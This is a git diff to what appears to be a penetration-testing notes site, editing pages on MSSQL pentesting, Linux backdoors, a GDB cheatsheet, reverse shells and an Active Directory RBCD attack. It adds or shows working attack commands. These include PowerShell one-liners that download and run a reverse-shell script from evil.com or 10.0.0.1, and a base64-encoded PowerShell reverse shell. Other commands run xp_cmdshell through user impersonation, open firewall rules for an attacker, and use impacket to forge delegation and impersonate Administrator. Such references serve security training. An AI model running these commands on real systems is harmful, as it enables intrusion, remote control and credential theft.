diff --git a/src/exploit/database/mssql-pentesting.md b/src/exploit/database/mssql-pentesting.md index d5f2d17..9589b74 100644 --- a/src/exploit/database/mssql-pentesting.md +++ b/src/exploit/database/mssql-pentesting.md @@ -7,7 +7,7 @@ tags: refs: - https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server - https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16 -date: 2024-04-01 +date: 2024-09-10 draft: false --- @@ -119,6 +119,16 @@ sqsh -S -U username -P password -D database > xp_dirtree 'C:\Users\' ``` +### Impersonate Other Users + +Reference: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#impersonation-of-other-users) + +```bash +# Assume that the 'sa' user can be impersonated. +EXECUTE AS 'sa' +EXEC xp_cmdshell 'whoami' +``` +
## Spawn a Windows Command Shell and Run Commands using Impacket diff --git a/src/exploit/linux/post-exploitation/linux-backdoors.md b/src/exploit/linux/post-exploitation/linux-backdoors.md index f5a4f9e..314166f 100644 --- a/src/exploit/linux/post-exploitation/linux-backdoors.md +++ b/src/exploit/linux/post-exploitation/linux-backdoors.md @@ -4,7 +4,7 @@ description: After compromising a target machine, the adversary attempts to esta tags: - Privilege Escalation refs: -date: 2024-08-20 +date: 2024-09-10 draft: false --- @@ -280,14 +280,19 @@ nc -lvnp 4444 ## Option: Firewall Bypass -If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege. +If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege. ```bash +# List the iptables settings +iptables --list + # ACCEPT: TARGET => ATTACKER +# OUTPUT 1: The first rule of the OUTPUT chain. # -d: Destination address iptables -I OUTPUT 1 -p tcp -d -j ACCEPT # ACCEPT: TARGET <= ATTACKER +# INPUT 1: The first rule of the INPUT chain. # -s: Source address iptables -I INPUT 1 -p tcp -s -j ACCEPT ``` diff --git a/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md b/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md index 64339ad..304c140 100644 --- a/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md +++ b/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md @@ -4,7 +4,7 @@ description: GDB (GNU Debugger) is a portable debugger used for reverse engineer tags: - Reverse Engineering refs: -date: 2024-08-28 +date: 2024-09-10 draft: false --- @@ -25,6 +25,37 @@ gdb ./example ## Commands in GDB +### Analysis + +```sh +# List functions. +info functions +``` + +### Breakpoints + +```bash +# Set a breakpoint at a specified line number, function, or address. +break main +b main +break *0x12345678 +# Add a breakpoint to the relative address position from the main function. +b *main+25 + +# Information about breakpoints +info breakpoints +i breakpoints +i b + +# Delete all breakpoints +delete breakpoints +d breakpoints +# Delete the specified breakpoint +delete +delete 1 +d 1 +``` + ### Debug ```bash @@ -59,30 +90,6 @@ set disassembly-flavor intel disass main ``` -### Breakpoints - -```bash -# Set a breakpoint at a specified line number, function, or address. -break main -b main -break *0x12345678 -# Add a breakpoint to the relative address position from the main function. -b *main+25 - -# Information about breakpoints -info breakpoints -i breakpoints -i b - -# Delete all breakpoints -delete breakpoints -d breakpoints -# Delete the specified breakpoint -delete -delete 1 -d 1 -``` - ### Values ```sh diff --git a/src/exploit/shell/reverse-shell-cheat-sheet.md b/src/exploit/shell/reverse-shell-cheat-sheet.md index 04eb6b5..21b5c3a 100644 --- a/src/exploit/shell/reverse-shell-cheat-sheet.md +++ b/src/exploit/shell/reverse-shell-cheat-sheet.md @@ -8,7 +8,7 @@ tags: refs: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -date: 2024-04-01 +date: 2024-09-10 draft: false --- @@ -133,6 +133,8 @@ powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234 powershell Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil.com/revshell.ps1') +powershell -c "Invoke-Expression (Invoke-WebRequest -usebasicparsing http://10.0.0.1:8000/revshell.ps1)" + # Base64 encoded payload powershell -e JGNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5Tb2NrZXRzLlRDUENsaWVudCgnMTAuMC4wLjEnLDEyMzQpOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKCk= diff --git a/src/exploit/windows/active-directory/resource-based-constrained-delegation-attack.md b/src/exploit/windows/active-directory/resource-based-constrained-delegation-attack.md index 6d8e56a..cb126ff 100644 --- a/src/exploit/windows/active-directory/resource-based-constrained-delegation-attack.md +++ b/src/exploit/windows/active-directory/resource-based-constrained-delegation-attack.md @@ -1,5 +1,5 @@ --- -title: Resource-Based Constrained Delegation Attack +title: RBCD (Resource-Based Constrained Delegation) Attack description: Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer. tags: - Active Directory @@ -7,7 +7,7 @@ tags: - Windows refs: - https://github.com/tothi/rbcd-attack -date: 2023-02-18 +date: 2024-09-10 draft: false --- @@ -27,7 +27,7 @@ To achieve this attack successfully, we need the following conditions: ### 1. Create Fake Computer ```bash -impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -dc-ip 10.0.0.1 example.local/username:password +impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password' ``` ### 2. Modify Delegation Rights @@ -35,9 +35,7 @@ impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -d We can use [rbcd.py](https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation) for abusing `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target. ```bash -rbcd.py -f FAKECOMPUTER -t WEB -dc-ip 10.0.0.1 example\\username:password - -rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-from user1 -action write -use-ldaps -k -no-pass +impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password' ``` ### 3. Get the Impersonated Service Ticket @@ -45,7 +43,9 @@ rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-fro Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc. ```bash -getST.py -spn cifs/example.local -impersonate admin -dc-ip 10.0.0.1 example.local/FAKECOMPUTER$:password +impacket-getST -spn 'cifs/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123' +# or +impacket-getST -spn 'ldap/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123' ``` ### 4. Use the Service Ticket @@ -68,3 +68,7 @@ klist # -no-pass: No password impacket-wmiexec example.local/Administrator@example.local -k -no-pass ``` + +- Dump credentials + + See [Dumping Windows Password Hashes](/exploit/windows/privilege-escalation/dumping-windows-password-hashes/) \ No newline at end of file diff --git a/src/exploit/windows/active-directory/smb-pentesting.md b/src/exploit/windows/active-directory/smb-pentesting.md index f3b129a..82cd22c 100644 --- a/src/exploit/windows/active-directory/smb-pentesting.md +++ b/src/exploit/windows/active-directory/smb-pentesting.md @@ -5,7 +5,7 @@ tags: - Active Directory - Windows refs: -date: 2024-08-11 +date: 2024-09-10 draft: false ---